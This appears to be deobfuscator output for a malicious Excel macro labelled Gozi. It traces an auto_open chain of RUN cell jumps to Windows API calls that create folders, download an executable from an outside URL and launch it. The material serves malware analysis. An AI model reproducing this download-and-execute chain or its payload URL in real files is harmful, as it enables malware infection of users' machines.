GOZI - XLSM macro

1. https://github.com/DissectMalware/XLMMacroDeobfuscator
2.  
3. [Loading Cells]
4. auto_open: auto_open->VRGaRHVfOOBnPlxMt!$FE$747
5. [Starting Deobfuscation]
6. CELL:FE747 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GC977)
7. CELL:GC977 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CE608)
8. CELL:CE608 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HT1777)
9. CELL:HT1777 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GH1639)
10. CELL:GH1639 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CT33)
11. CELL:CT33 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AM806)
12. CELL:AM806 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BO623)
13. CELL:BO623 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EF937)
14. CELL:EF937 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!ER4)
15. CELL:ER4 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FD1754)
16. CELL:FD1754 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AB1107)
17. CELL:AB1107 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FW26)
18. CELL:FW26 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AQ1559)
19. CELL:AQ1559 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AU1227)
20. CELL:AU1227 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!DJ860)
21. CELL:DJ860 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EV1102)
22. CELL:EV1102 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BK1730)
23. CELL:BK1730 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IN1596)
24. CELL:IN1596 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!W113)
25. CELL:W113 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CW33)
26. CELL:CW33 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BV887)
27. CELL:BV887 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HF85)
28. CELL:HF85 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FS174)
29. CELL:FS174 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FK665)
30. CELL:FK665 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EH437)
31. CELL:EH437 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BK1)
32. CELL:BK1 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BO527)
33. CELL:BO527 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!DQ678)
34. CELL:DQ678 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HJ904)
35. CELL:HJ904 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!L685)
36. CELL:L685 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IG1778)
37. CELL:IG1778 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!ID1772)
38. CELL:ID1772 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HU1035)
39. CELL:HU1035 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!DA758)
40. CELL:DA758 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GV1657)
41. CELL:GV1657 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IG527)
42. CELL:IG527 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FZ1345)
43. CELL:FZ1345 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!ID662)
44. CELL:ID662 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HL1309)
45. CELL:HL1309 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GF1894)
46. CELL:GF1894 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FO637)
47. CELL:FO637 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EY645)
48. CELL:EY645 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EC1430)
49. CELL:EC1430 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GW1349)
50. CELL:GW1349 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!B1008)
51. CELL:B1008 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EG264)
52. CELL:EG264 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FH921)
53. CELL:FH921 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EY46)
54. CELL:EY46 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BP1427)
55. CELL:BP1427 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BP38)
56. CELL:BP38 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!N1394)
57. CELL:N1394 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AF1830)
58. CELL:AF1830 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!C629)
59. CELL:C629 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BT1915)
60. CELL:BT1915 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CT1558)
61. CELL:CT1558 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IJ79)
62. CELL:IJ79 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CV56)
63. CELL:CV56 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EY479)
64. CELL:EY479 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IJ1998)
65. CELL:IJ1998 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FQ13)
66. CELL:FQ13 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!G17)
67. CELL:G17 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EL1806)
68. CELL:EL1806 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EB81)
69. CELL:EB81 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HR149)
70. CELL:HR149 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!Y638)
71. CELL:Y638 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HO1023)
72. CELL:HO1023 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HR655)
73. CELL:HR655 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CU1391)
74. CELL:CU1391 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AI449)
75. CELL:AI449 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CM295)
76. CELL:CM295 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!P231)
77. CELL:P231 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!I330)
78. CELL:I330 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EC1616)
79. CELL:EC1616 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CX1834)
80. CELL:CX1834 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FD1365)
81. CELL:FD1365 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FG1801)
82. CELL:FG1801 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CK1675)
83. CELL:CK1675 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GQ683)
84. CELL:GQ683 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AJ981)
85. CELL:AJ981 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!C329)
86. CELL:C329 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BD1629)
87. CELL:BD1630 , FullEvaluation ,CALL("Kernel32","CreateDirectoryA","JCJ","C:\dechTZg",0)
88. CELL:BD1631 , FullEvaluation ,CALL("Kernel32","CreateDirectoryA","JCJ","C:\dechTZg\xYXndgX",0)
89. CELL:BD1632 , FullEvaluation ,CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://post.positivefocusskills.com/abonento9.exe","C:\dechTZg\xYXndgX\zfmFNDi.exe",0,0)
90. CELL:BD1633 , FullEvaluation ,CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\dechTZg\xYXndgX\zfmFNDi.exe",,0,0)
91. CELL:BD1638 , End ,HALT()
92. time elapsed: 0.7665233612060547